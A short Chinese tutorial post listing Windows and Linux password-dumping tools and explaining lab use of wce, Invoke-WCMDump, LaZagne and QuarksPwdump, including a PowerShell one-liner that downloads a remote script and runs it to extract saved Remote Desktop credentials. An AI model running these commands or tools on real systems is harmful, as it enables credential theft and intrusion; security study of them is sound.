声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理
window
- wce
- Ivoke-WCMDump
- Lazagne
- QuarksPwdump
- mimikatz
- mimiDbg
- Nirsoft_package
- fgdump
- 星号查看器
Linux
- LaZagne
- mimipenguin
没有介绍的百度都有使用也非常简单
使用讲解:
1、wce.exe
使用管理员登录,进入到软件所在目录,输入wce.exe -h
可查看帮助信息
常用命令wce.exe -l
2、Invoke-WCMDump
先查看win2003的ip
在win2008中win R输入mstsc打开远程桌面输入win2003ip,勾选保存凭证
输入win2003的账号密码,勾选两个保存凭证
成功连接后就可以退出了
查看物理机ip
将物理机ip加入powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.14/Invoke-WCMDump.ps1');Invoke-WCMDump"
中,然后在win2008的终端中执行就能看到登陆过远程桌面的win2003密码了
3、Lazagne
这工具需要python环境,使用时进入所在目录即可,-h参数查看帮助
想获取哪方面的密码直接在后面加参数即可,功能翻译如下
代码语言:txt复制chats 运行聊天模块
mails 运行邮件模块
all 全部运行所有模块
git 运行git模块
svn 运行svn模块
windows 运行windows模块
wifi 运行wifi模块
maven 运行maven模块
sysadmin 运行sysadmin模块
browsers 浏览器运行浏览器模块
games 运行游戏模块
multimedia 运行多媒体模块
memory 运行存储器模块
databases 运行数据库模块
php 运行php模块
4、QuarksPwdump
將QuarksPwdump上传到win2008中
点击下方的powershell按钮,然后进入软件目录直接执行该软件
然后复制选中区域,加到软件名后执行即可
欢迎关注公众号,原创不易,转载请注明来源哦